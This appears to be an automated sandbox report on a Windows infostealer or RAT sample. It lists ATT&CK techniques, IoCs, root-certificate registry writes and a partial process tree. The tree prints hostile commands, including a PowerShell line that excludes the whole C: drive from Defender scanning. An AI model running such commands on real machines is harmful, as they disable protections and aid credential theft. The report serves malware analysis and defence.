47ab7d1fae33e1ec1b456cbdc133738c7992af9a47c0638d3a365c2e609d09a2

Analysis

max time kernel
132s
max time network
115s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27/08/2024, 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
Size

14.0MB
MD5

d05c023eccc1da17f58c6e83fcb7a48d
SHA1

0979e711d628aa30fc8c687799fd98799c4928a8
SHA256

47ab7d1fae33e1ec1b456cbdc133738c7992af9a47c0638d3a365c2e609d09a2
SHA512

b1358c4b0da40aa0fac3ab596b65d5e9c3b3dd9c4d6fb42e17c059b68ed0817ea839c546039f52cc7080b598f1107627ff515db7b34e916311c2b47f71eb376b
SSDEEP

196608:GSG4xZcgzl5uvhHfIpHm9fD02kb/zIf8ryQ5S:GYxt5khHQpHm9fLkDzIfxA

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	2432	powershell.exe
15	5112	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2432	powershell.exe
5112	powershell.exe
1640	PowerShell.exe
3904	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2960	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
11	raw.githubusercontent.com
14	raw.githubusercontent.com
15	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2996	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2224	netsh.exe
3228	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4300	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1656	ipconfig.exe
4300	NETSTAT.EXE
3216	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1692	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2432	powershell.exe
3904	powershell.exe
1640	PowerShell.exe
2432	powershell.exe
5112	powershell.exe
1640	PowerShell.exe
3904	powershell.exe
5112	powershell.exe
5112	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	1640	PowerShell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: 33	2716	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2716	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	5112	powershell.exe
Token: SeSecurityPrivilege	5112	powershell.exe
Token: SeTakeOwnershipPrivilege	5112	powershell.exe
Token: SeLoadDriverPrivilege	5112	powershell.exe
Token: SeSystemProfilePrivilege	5112	powershell.exe
Token: SeSystemtimePrivilege	5112	powershell.exe
Token: SeProfSingleProcessPrivilege	5112	powershell.exe
Token: SeIncBasePriorityPrivilege	5112	powershell.exe
Token: SeCreatePagefilePrivilege	5112	powershell.exe
Token: SeBackupPrivilege	5112	powershell.exe
Token: SeRestorePrivilege	5112	powershell.exe
Token: SeShutdownPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeSystemEnvironmentPrivilege	5112	powershell.exe
Token: SeRemoteShutdownPrivilege	5112	powershell.exe
Token: SeUndockPrivilege	5112	powershell.exe
Token: SeManageVolumePrivilege	5112	powershell.exe
Token: 33	5112	powershell.exe
Token: 34	5112	powershell.exe
Token: 35	5112	powershell.exe
Token: 36	5112	powershell.exe
Token: SeIncreaseQuotaPrivilege	5112	powershell.exe
Token: SeSecurityPrivilege	5112	powershell.exe
Token: SeTakeOwnershipPrivilege	5112	powershell.exe
Token: SeLoadDriverPrivilege	5112	powershell.exe
Token: SeSystemProfilePrivilege	5112	powershell.exe
Token: SeSystemtimePrivilege	5112	powershell.exe
Token: SeProfSingleProcessPrivilege	5112	powershell.exe
Token: SeIncBasePriorityPrivilege	5112	powershell.exe
Token: SeCreatePagefilePrivilege	5112	powershell.exe
Token: SeBackupPrivilege	5112	powershell.exe
Token: SeRestorePrivilege	5112	powershell.exe
Token: SeShutdownPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeSystemEnvironmentPrivilege	5112	powershell.exe
Token: SeRemoteShutdownPrivilege	5112	powershell.exe
Token: SeUndockPrivilege	5112	powershell.exe
Token: SeManageVolumePrivilege	5112	powershell.exe
Token: 33	5112	powershell.exe
Token: 34	5112	powershell.exe
Token: 35	5112	powershell.exe
Token: 36	5112	powershell.exe
Token: SeIncreaseQuotaPrivilege	5112	powershell.exe
Token: SeSecurityPrivilege	5112	powershell.exe
Token: SeTakeOwnershipPrivilege	5112	powershell.exe
Token: SeLoadDriverPrivilege	5112	powershell.exe
Token: SeSystemProfilePrivilege	5112	powershell.exe
Token: SeSystemtimePrivilege	5112	powershell.exe
Token: SeProfSingleProcessPrivilege	5112	powershell.exe
Token: SeIncBasePriorityPrivilege	5112	powershell.exe
Token: SeCreatePagefilePrivilege	5112	powershell.exe
Token: SeBackupPrivilege	5112	powershell.exe
Token: SeRestorePrivilege	5112	powershell.exe
Token: SeShutdownPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeSystemEnvironmentPrivilege	5112	powershell.exe
Token: SeRemoteShutdownPrivilege	5112	powershell.exe
Token: SeUndockPrivilege	5112	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 3836 wrote to memory of 2660	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	87
PID 3836 wrote to memory of 2660	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	87
PID 3836 wrote to memory of 1640	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	88
PID 3836 wrote to memory of 1640	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	88
PID 3836 wrote to memory of 3904	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	89
PID 3836 wrote to memory of 3904	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	89
PID 3836 wrote to memory of 2432	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	90
PID 3836 wrote to memory of 2432	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	90
PID 3836 wrote to memory of 4596	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	91
PID 3836 wrote to memory of 4596	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	91
PID 4596 wrote to memory of 4824	4596	cmd.exe	92
PID 4596 wrote to memory of 4824	4596	cmd.exe	92
PID 3836 wrote to memory of 5112	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	93
PID 3836 wrote to memory of 5112	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	93
PID 3836 wrote to memory of 3952	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	95
PID 3836 wrote to memory of 3952	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	95
PID 2432 wrote to memory of 4696	2432	powershell.exe	96
PID 2432 wrote to memory of 4696	2432	powershell.exe	96
PID 5112 wrote to memory of 2444	5112	powershell.exe	97
PID 5112 wrote to memory of 2444	5112	powershell.exe	97
PID 4696 wrote to memory of 4880	4696	csc.exe	98
PID 4696 wrote to memory of 4880	4696	csc.exe	98
PID 2444 wrote to memory of 4080	2444	csc.exe	99
PID 2444 wrote to memory of 4080	2444	csc.exe	99
PID 5112 wrote to memory of 2224	5112	powershell.exe	104
PID 5112 wrote to memory of 2224	5112	powershell.exe	104
PID 5112 wrote to memory of 4344	5112	powershell.exe	107
PID 5112 wrote to memory of 4344	5112	powershell.exe	107
PID 4344 wrote to memory of 1448	4344	net.exe	108
PID 4344 wrote to memory of 1448	4344	net.exe	108
PID 5112 wrote to memory of 2960	5112	powershell.exe	109
PID 5112 wrote to memory of 2960	5112	powershell.exe	109
PID 5112 wrote to memory of 1928	5112	powershell.exe	110
PID 5112 wrote to memory of 1928	5112	powershell.exe	110
PID 5112 wrote to memory of 4516	5112	powershell.exe	111
PID 5112 wrote to memory of 4516	5112	powershell.exe	111
PID 4516 wrote to memory of 4532	4516	net.exe	112
PID 4516 wrote to memory of 4532	4516	net.exe	112
PID 5112 wrote to memory of 1656	5112	powershell.exe	113
PID 5112 wrote to memory of 1656	5112	powershell.exe	113
PID 5112 wrote to memory of 1292	5112	powershell.exe	114
PID 5112 wrote to memory of 1292	5112	powershell.exe	114
PID 1292 wrote to memory of 2264	1292	net.exe	115
PID 1292 wrote to memory of 2264	1292	net.exe	115
PID 5112 wrote to memory of 4136	5112	powershell.exe	116
PID 5112 wrote to memory of 4136	5112	powershell.exe	116
PID 5112 wrote to memory of 4300	5112	powershell.exe	117
PID 5112 wrote to memory of 4300	5112	powershell.exe	117
PID 5112 wrote to memory of 1288	5112	powershell.exe	118
PID 5112 wrote to memory of 1288	5112	powershell.exe	118
PID 5112 wrote to memory of 3216	5112	powershell.exe	119
PID 5112 wrote to memory of 3216	5112	powershell.exe	119
PID 5112 wrote to memory of 3468	5112	powershell.exe	120
PID 5112 wrote to memory of 3468	5112	powershell.exe	120
PID 5112 wrote to memory of 2996	5112	powershell.exe	121
PID 5112 wrote to memory of 2996	5112	powershell.exe	121
PID 5112 wrote to memory of 3228	5112	powershell.exe	122
PID 5112 wrote to memory of 3228	5112	powershell.exe	122
PID 3836 wrote to memory of 1692	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	125
PID 3836 wrote to memory of 1692	3836	2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe	125

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3952	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3836
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:2660
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3904
